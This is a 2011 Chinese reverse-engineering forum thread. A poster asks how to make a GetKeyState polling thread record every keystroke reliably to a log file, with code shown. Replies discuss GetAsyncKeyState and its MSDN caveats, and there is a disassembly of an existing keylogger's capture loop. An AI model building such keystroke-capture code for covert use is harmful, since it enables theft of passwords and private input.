首页
论坛
课程
招聘
[求助]GetKeySate捕捉击键,如何做到精准。
2011-3-31 13:54 4769

[求助]GetKeySate捕捉击键,如何做到精准。

2011-3-31 13:54
4769
创建一个线程,然后循环利用GetKeyState捕捉按键,但是存在一个问题。按下一个字符,重复记录N次。
如何做到通用,字符记一下。
目前是Sleep(10)睡眠10毫秒,效果超级差。
DWORD  WINAPI  ThreadProc(LPVOID lpParam)
{
		do 
		{
			Sleep(10);
			//OutputDebugString("Enter");
			char a={0};
			a=PressKey();
			//OutputDebugString(a);
			
			KeyWrite("c:\\1.log",&a);
			
		} while (Flag);
		ExitThread(0);
		return 1;
}

[注意] 欢迎加入看雪团队!base上海,招聘安全工程师、逆向工程师多个坑位等你投递!

收藏
点赞0
打赏
分享
最新回复 (7)
雪    币: 130
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
nfgfgo 活跃值 2011-3-31 15:30
2
0
。。。也有智能弹窗的
雪    币: 1894
活跃值: 活跃值 (392)
能力值: ( LV13,RANK:420 )
在线值:
发帖
回帖
粉丝
demoscene 活跃值 7 2011-3-31 16:24
3
0
貌似这样可以
int i = 0;
	while(1)
	{
		if (GetAsyncKeyState(VK_SHIFT) & 0x1)
		{
			i++;
			printf("shift Pressed %d!\r\n",i);
		}
	}

不过MSDN不推荐这样用,因为如果其它程序调用了GetAsyncKeyState会影响到GetAsyncKeyState的返回值
Although the least significant bit of the return value indicates whether the key has been pressed since the last query, 
due to the pre-emptive multitasking nature of Windows, another application can call 
GetAsyncKeyState and receive the "recently pressed" bit instead of your application. 
The behavior of the least significant bit of the return value is retained strictly for compatibility 
with 16-bit Windows applications (which are non-preemptive) and should not be relied upon.
雪    币: 79
活跃值: 活跃值 (45)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
竹君 活跃值 5 2011-3-31 16:46
4
0
什么意思?智能弹窗。
雪    币: 79
活跃值: 活跃值 (45)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
竹君 活跃值 5 2011-3-31 22:13
5
0
没人来顶一下呢。AKLT利用GetKeyState可以做到准确。但是做不到大小写,特殊字符。用OD跟了下,发现他也是sleep 10ms而已啊。
雪    币: 79
活跃值: 活跃值 (45)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
竹君 活跃值 5 2011-3-31 22:50
6
0
00402C7F   .  C64424 08 01  mov     byte ptr [esp+8], 1
00402C84   >  C74424 0C 000>mov     dword ptr [esp+C], 0
00402C8C   >  B8 FF000000   mov     eax, 0FF
00402C91   .  3B4424 0C     cmp     eax, dword ptr [esp+C]
00402C95   .  0F8C 65010000 jl      00402E00
00402C9B   .  E8 6A5C0100   call    <jmp.&USER32.GetForegroundWindow>; [GetForegroundWindow
00402CA0   .  894424 10     mov     dword ptr [esp+10], eax
00402CA4   .  FF7424 0C     push    dword ptr [esp+C]                ; /Key
00402CA8   .  E8 8D5C0100   call    <jmp.&USER32.GetKeyState>        ; \GetKeyState
00402CAD   .  89C3          mov     ebx, eax
00402CAF   .  81E3 00400000 and     ebx, 4000
00402CB5   .  21DB          and     ebx, ebx
00402CB7   .  0F84 19010000 je      00402DD6
00402CBD   .  68 02000000   push    2                                ; /Action = 2
00402CC2   .  FF7424 10     push    dword ptr [esp+10]               ; |Key
00402CC6   .  E8 455C0100   call    <jmp.&USER32.MapVirtualKeyA>     ; \MapVirtualKeyA
00402CCB   .  880424        mov     byte ptr [esp], al
00402CCE   .  FF35 24B14200 push    dword ptr [42B124]
00402CD4   .  68 0E000000   push    0E
00402CD9   .  E8 521D0100   call    00414A30
00402CDE   .  83EC 04       sub     esp, 4
00402CE1   .  8D4C24 08     lea     ecx, dword ptr [esp+8]
00402CE5   .  5A            pop     edx
00402CE6   .  E8 15130000   call    00404000
00402CEB   .  FF35 24B14200 push    dword ptr [42B124]
00402CF1   .  8B5424 08     mov     edx, dword ptr [esp+8]
00402CF5   .  FF35 24B14200 push    dword ptr [42B124]
00402CFB   .  E8 10560100   call    00418310
00402D00   .  FF35 24B14200 push    dword ptr [42B124]
00402D06   .  0FB64424 0C   movzx   eax, byte ptr [esp+C]
00402D0B   .  50            push    eax
00402D0C   .  E8 6F150000   call    00404280
00402D11   .  83EC 04       sub     esp, 4
00402D14   .  58            pop     eax
00402D15   .  FF05 24B14200 inc     dword ptr [42B124]
00402D1B   .  68 0E000000   push    0E
00402D20   .  8B15 C4724200 mov     edx, dword ptr [4272C4]
00402D26   .  015424 04     add     dword ptr [esp+4], edx
00402D2A   .  E8 61170100   call    00414490
00402D2F   .  8F05 24B14200 pop     dword ptr [42B124]
00402D35   .  803D DAA74200>cmp     byte ptr [42A7DA], 0
00402D3C   .  74 04         je      short 00402D42
00402D3E   .  31C0          xor     eax, eax
00402D40   .  EB 05         jmp     short 00402D47
00402D42   >  B8 01000000   mov     eax, 1
00402D47   >  21C0          and     eax, eax
00402D49   .  0F84 87000000 je      00402DD6
00402D4F   .  8B1D C4A74200 mov     ebx, dword ptr [42A7C4]
00402D55   .  3B5C24 10     cmp     ebx, dword ptr [esp+10]
00402D59   .  74 7B         je      short 00402DD6
00402D5B   .  FF7424 04     push    dword ptr [esp+4]
00402D5F   .  E8 FC140000   call    00404260
00402D64   .  89C3          mov     ebx, eax
00402D66   .  21DB          and     ebx, ebx
00402D68   .  7E 41         jle     short 00402DAB
00402D6A   .  FF35 24B14200 push    dword ptr [42B124]
00402D70   .  FF35 24B14200 push    dword ptr [42B124]
00402D76   .  0FB64424 08   movzx   eax, byte ptr [esp+8]
00402D7B   .  50            push    eax
00402D7C   .  E8 FF140000   call    00404280
00402D81   .  83EC 04       sub     esp, 4
00402D84   .  FF05 24B14200 inc     dword ptr [42B124]
00402D8A   .  8B15 C4724200 mov     edx, dword ptr [4272C4]
00402D90   .  011424        add     dword ptr [esp], edx
00402D93   .  E8 C8140000   call    00404260
00402D98   .  8F05 24B14200 pop     dword ptr [42B124]
00402D9E   .  89C3          mov     ebx, eax
00402DA0   .  21DB          and     ebx, ebx
00402DA2   .  7E 07         jle     short 00402DAB
00402DA4   .  B8 01000000   mov     eax, 1
00402DA9   .  EB 02         jmp     short 00402DAD
00402DAB   >  31C0          xor     eax, eax
00402DAD   >  21C0          and     eax, eax
00402DAF   .  74 25         je      short 00402DD6
00402DB1   .  68 01000000   push    1
00402DB6   .  68 16000000   push    16
00402DBB   .  E8 201C0100   call    004149E0
00402DC0   .  68 00000000   push    0
00402DC5   .  68 18000000   push    18
00402DCA   .  E8 111C0100   call    004149E0
00402DCF   .  C605 DAA74200>mov     byte ptr [42A7DA], 1
00402DD6   >  FF7424 0C     push    dword ptr [esp+C]                ; /Key
00402DDA   .  E8 5B5B0100   call    <jmp.&USER32.GetKeyState>        ; \GetKeyState
00402DDF   .  89C3          mov     ebx, eax
00402DE1   .  81E3 00400000 and     ebx, 4000
00402DE7   .  21DB          and     ebx, ebx
00402DE9   .  74 0C         je      short 00402DF7
00402DEB   .  68 0A000000   push    0A                               ; /Timeout = 10. ms
00402DF0   .  E8 6F120000   call    <jmp.&KERNEL32.Sleep>            ; \Sleep
00402DF5   .^ EB DF         jmp     short 00402DD6
00402DF7   >  FF4424 0C     inc     dword ptr [esp+C]
00402DFB   .^ E9 8CFEFFFF   jmp     00402C8C
00402E00   >  68 0A000000   push    0A                               ; /Timeout = 10. ms
00402E05   .  E8 5A120000   call    <jmp.&KERNEL32.Sleep>            ; \Sleep
00402E0A   .^ E9 75FEFFFF   jmp     00402C84
00402E0F   .  31C0          xor     eax, eax
00402E11   .  FF7424 04     push    dword ptr [esp+4]
00402E15   .  E8 56550100   call    00418370
00402E1A   .  83C4 14       add     esp, 14
00402E1D   .  5B            pop     ebx
00402E1E   .  C3            retn

雪    币: 79
活跃值: 活跃值 (45)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
竹君 活跃值 5 2011-4-1 14:38
7
0
GetKeyState GetAsyncKeyState如此的不靠谱啊。记得是乱七八糟。
雪    币: 79
活跃值: 活跃值 (45)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
竹君 活跃值 5 2011-4-1 14:54
8
0
12345679
12345679
1234679
12346789
12346789
5次连续输入123456789利用GetKetState所记录的。但是AKLT为什么却不会出错了,或者说出错的概率非常低呢。


有好的方法或者了解过的论坛兄弟 解答下。
上传的附件:
  • 2.jpg (89.17kb,54次下载)
游客
登录 | 注册 方可回帖
返回